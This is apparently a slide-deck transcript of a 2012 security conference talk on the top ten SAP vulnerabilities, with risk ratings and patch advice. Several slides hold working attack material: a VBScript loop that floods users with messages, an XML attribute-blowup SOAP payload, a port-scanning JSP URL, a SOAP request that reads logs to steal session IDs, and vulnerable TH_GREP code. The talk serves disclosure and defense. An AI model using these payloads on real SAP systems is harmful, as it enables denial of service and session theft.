What CISOs should know about SAP securityERPScan
 

Ähnlich wie SAP (In)Security: New and Best (20)

SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and best
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP Solutions
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platforms
 
Attacks on SAP Mobile
Attacks on SAP MobileAttacks on SAP Mobile
Attacks on SAP Mobile
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)security
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn Cường
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
 
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn Cường
 
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP Mobile
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM Hacking
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
 

Mehr von Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikPositive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQubePositive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityPositive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для ApproofPositive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложенийPositive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложенийPositive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application SecurityPositive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОPositive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке СиPositive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опытPositive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterPositive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиPositive Hack Days
 

Mehr von Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Kürzlich hochgeladen

Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Angeliki Cooney
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfOverkill Security
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 

Kürzlich hochgeladen (20)

Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 

SAP (In)Security: New and Best

  • 1. Invest in security to secure investments SAP (In)Security: New and Best Alexander Polyakov CTO at ERPScan/Digital Security May 31, 2012
  • 2. Me Business application security expert
  • 4. What is SAP ? Shut up And Pay
  • 5. Really • The most popular business application • More than 120000 customers • 74% of Forbes 500
  • 6. Agenda • Intro • SAP security history • SAP on the Internet • Most popular SAP issues (OLD) • Top 10 latest interesting attacks (NEW) • DEMOs • Conclusion
  • 7. 3 areas of SAP Security 2002 Business logic security Prevents attacks or mistakes made by insiders Solution: GRC 2008 ABAP Code security Prevents attacks or mistakes made by developers Solution: Code audit 2010 Application platform security Prevents unauthorized access both within the corporate network and from remote attackers Solution?
  • 8. Talks about SAP security 35 30 Most popular: • BlackHat 25 • HITB • Troopers 20 • RSA • Source 15 • DeepSec • etc. 10 5 0 2006 2007 2008 2009 2010 2011 2012
  • 9. SAP Security notes 900 800 700 600 500 By April 26, 2012, a total of 2026 notes 400 300 200 100 0 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012
  • 10. SAP vulnerabilities by type 1 - Directory Traversal 2 - XSS/Unauthorised modification of stored content 3 - Missing Auth check 4 - Information Disclosure 5 - Unauthorized usage of application functionality 6 - Hard-coded credentials 7 - Code injection vulnerability 8 - Verb tampering Stats from : 9 - Remote Code Execution • 1Q 2012 • 1Q 2010 10 - Denial of service • 4Q 2009 11 - BOF 12 -SQL Inj 0 50 100 150 200 250 300 350
  • 11. Top problems by OWASP-EAS (Implementation issues) EASAI-1 Lack of patch management EASAI-2 Default Passwords for application access EASAI-3 SOD conflicts EASAI-4 Unnecessary Enabled Application features EASAI-5 Open Remote management interfaces EASAI-6 lack of password lockout/complexity checks EASAI-7 Insecure options EASAI-8 Unencrypted communications EASAI-9 Insecure trust relations EASAI-10 Guest access
  • 12. Top problems by BIZEC ● BIZEC TEC-01: Vulnerable Software in Use ● BIZEC TEC-02: Standard Users with Default Passwords ● BIZEC TEC-03: Unsecured SAP Gateway ● BIZEC TEC-04: Unsecured SAP/Oracle authentication ● BIZEC TEC-05: Insecure RFC interfaces ● BIZEC TEC-06: Insufficient Security Audit Logging ● BIZEC TEC-07: Unsecured SAP Message Server ● BIZEC TEC-08: Dangerous SAP Web Applications ● BIZEC TEC-09: Unprotected Access to Administration Services ● BIZEC TEC-10: Insecure Network Environment ● BIZEC TEC-11: Unencrypted Communications
  • 13. Business Risks Espionage • Stealing financial information • Stealing corporate secrets • Stealing suppliers and customers list • Stealing HR data Sabotage • Denial of service • Modification of financial reports • Access to technology network (SCADA) by trust relations Fraud • False transactions • Modification of master data • e.t.c.
  • 14. SAP on the Internet MYTH: SAP systems attacks available only for insiders • We have collected data about SAP systems in the WEB • Have various stats by countries, applications, versions • Information from Google, Shodan, Nmap scan
  • 15. SAP on the Internet
  • 16. SAP on the Internet About 5000 systems including Dispatcher, Message server, SapHostcontrol, Web- services
  • 17. Top 10 vulnerabilities 2011-2012 1. Authentication Bypass via Verb tampering 2. Authentication Bypass via the Invoker servlet 3. Buffer overflow in ABAP Kernel 4. Code execution via TH_GREP N 5. MMC read SESSIONID N 6. Remote portscan Nw 7. Encryption in SAPGUI N N w 8. BAPI XSS/SMBRELAY N N N Nw 9. XML Blowup DOS w N 10. GUI Scripting DOS w
  • 18. 10 – GUI-Scripting DOS: Description New • SAP users can run scripts which automate their user functions • A script has the same rights in SAP as the user who launched it • Security message which is shown to user can be turned off in the registry • Almost any user can use SAP Messages (SM02 transaction) • It is possible to run DOS attack on any user using a simple script Author: Dmitry Chastukhin (ERPScan)
  • 19. 10 – GUI-scripting: Details If Not IsObject(application) Then Set SapGuiAuto = GetObject("SAPGUI") Set application = SapGuiAuto.GetScriptingEngine End If If Not IsObject(connection) Then Set connection = application.Children(0) End If If Not IsObject(session) Then Set session = connection.Children(0) End If If IsObject(WScript) Then WScript.ConnectObject session, "on" WScript.ConnectObject application, "on" End If do a=a+1 session.findById("wnd[0]").maximize session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02" session.findById("wnd[0]/tbar[0]/btn[0]").press session.findById("wnd[0]/tbar[1]/btn[34]").press session.findById("wnd[1]/usr/txtEMLINE1").text = "hello" session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0 session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0 session.findById("wnd[1]").sendVKey 4 session.findById("wnd[2]/usr/lbl[1,3]").setFocus session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15 session.findById("wnd[2]").sendVKey 2 session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800" session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en" session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2 session.findById("wnd[1]/tbar[0]/btn[0]").press Loop Until a>=1000
  • 20. 10 – GUI-scripting: Other attacks Script can be uploaded using: – SAPGUI ActiveX vulnerability – Teensy USB flash – Any other method of client exploitation Other attacks like changing banking accounts in LFBK also possible
  • 21. 10 – GUI-scripting: Business risks Sabotage – High Espionage – No Fraud – No Ease of exploitation – Medium
  • 22. 10 – GUI-scripting: Prevention • SAP GUI Scripting Security Guide • sapgui/user_scripting = FALSE • Block registry modification on workstations
  • 23. 9 – XML Blowup DOS: Description New • WEBRFC interface can be used to run RFC functions • By default any user can have access • Can execute at least RFC_PING • SAP NetWeaver is vulnerable to malformed XML packets • It is possible to run DOS attack on server using simple script • It is possible to run over the Internet! Author: Alexey Tyurin (ERPScan)
  • 24. 9 – XML Blowup DOS: Details <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Body><m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions" a1="" a2="" ... a10000="" > </m:RFC_PING> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
  • 25. 9 – XML Blowup DOS: Business risks Sabotage – Critical Espionage – No Fraud – No Ease of exploitation – Medium
  • 26. 9 – XML Blowup DOS: Prevention • Disable WEBRFC • Prevent unauthorized access to WEBRFC using S_ICF • Install SAP notes 1543318 and 1469549
  • 27. 8 – BAPI script injection/hash stealing : Description • SAP BAPI transaction fails to properly sanitize input • Possible to inject JavaScript code or link to a fake SMB server • SAP GUI clients use Windows so their credentials will be transferred to attackers host. Author: Dmitry Chastukhin (ERPScan)
  • 28. 8 – BAPI script injection/hash stealing: Demo New
  • 29. 8 – BAPI script injection/hash stealing: Business risks Espionage – High Sabotage – High Fraud – High Ease of exploitation – Low
  • 30. 7 – SAP GUI bad encryption: Description New • SAP FrontEnd can save encrypted passwords in shortcuts • Shortcuts stored in .sap file • This password uses byte-XOR algorithm with “secret” key • Key has the same value for every installation of SAP GUI • Any password can be decrypted in 1 second Author: Alexey Sintsov (ERPScan)
  • 31. 7 – SAP GUI bad encryption: Demo
  • 32. 7 – SAP GUI bad encryption: Business risks Espionage – High Sabotage – Medium Fraud – High Ease of exploitation – Medium
  • 33. 7 – SAP GUI bad encryption: Prevention • Disable password storage in GUI
  • 34. 6 – Remote port scan via JSP: Description • It is possible to scan internal network from the Internet • Authentication is not required • SAP NetWeaver J2EE engine is vulnerable /ipcpricing/ui/BufferOverview.jsp? server=172.16.0.13 & port=31337 & password= & dispatcher= & targetClient= & view= Author: Alexander Polyakov (ERPScan)
  • 35. 6 – Remote port scan via JSP: Demo Host is not alive HTTP port Port closed SAP port
  • 36. 6 – Remote port scan via JSP: Business risks Sabotage – Low Espionage – Medium Fraud – No Ease of exploitation – High
  • 37. 6 – Remote port scan via JSP: Prevention • Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883 • Disable unnecessary applications
  • 38. 5 – MMC JSESSIONID stealing: Description New • Remote management of SAP Platform • By default, many commands go without auth • Exploits implemented in Metasploit (by ChrisJohnRiley) • Most of the bugs are information disclosure • It is possible to find information about JSESSIONID • Only if trace is ON 1) Original bug by ChrisJohnRiley 2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan) Can be authenticated as an existing user remotely
  • 39. 5 – MMC SESSIONID stealing: Details <?xml version="1.0" encoding="UTF-8" ?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess = "http://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:ReadLogFile xmlns:ns1="urn:SAPControl"> <filename>j2ee/cluster/server0/log/system/userinterface.log</filename> <filter></filter> <language></language> <maxentries>100</maxentries> <statecookie>EOF</statecookie> </ns1:ReadLogFile> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
  • 40. 5 – MMC JSESSIONID stealing: Business risks Espionage – Critical Fraud – High Sabotage – Medium Ease of exploitation – Medium
  • 41. 5 – MMC JSESSIONID stealing: Prevention • The JSESSIONID by default will not be logged in log file • Don’t use TRACE_LEVEL = 3 on production systems or delete traces after use • Other info http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000 a114084/frameset.htm
  • 42. 4 – Remote command execution in TH_GREP: Description • RCE vulnerability in RFC module TH_GREP • Found by Joris van de Vis • SAP was not properly patched (1433101) • We have discovered that the patch can be bypassed in Windows Original bug by Joris van de Vis (erp-sec) Bypass by Alexey Tyurin (ERPScan)
  • 43. 4 – RCE in TH_GREP: Details elseif opsys = 'Windows NT'. concatenate '/c:"' string '"' filename into grep_params in character mode. else. /*if linux*/ /* 185 */ replace all occurrences of '''' in local_string with '''"''"'''. /* 186 */ concatenate '''' local_string '''' filename into grep_params /* 187*/ in character mode. /* 188*/ endif. /* 188*/
  • 44. 4 – RCE in TH_GREP: Demo #1
  • 45. 4 - RCE in TH_GREP: More details 4 ways to execute vulnerable program • Using transaction "Se37“ • Using transaction “SM51“ (thanks to Felix Granados) • Using remote RFC call "TH_GREP" • Using SOAP RFC call "TH_GREP" via web
  • 46. 4 – RCE in TH_GREP: Demo #2
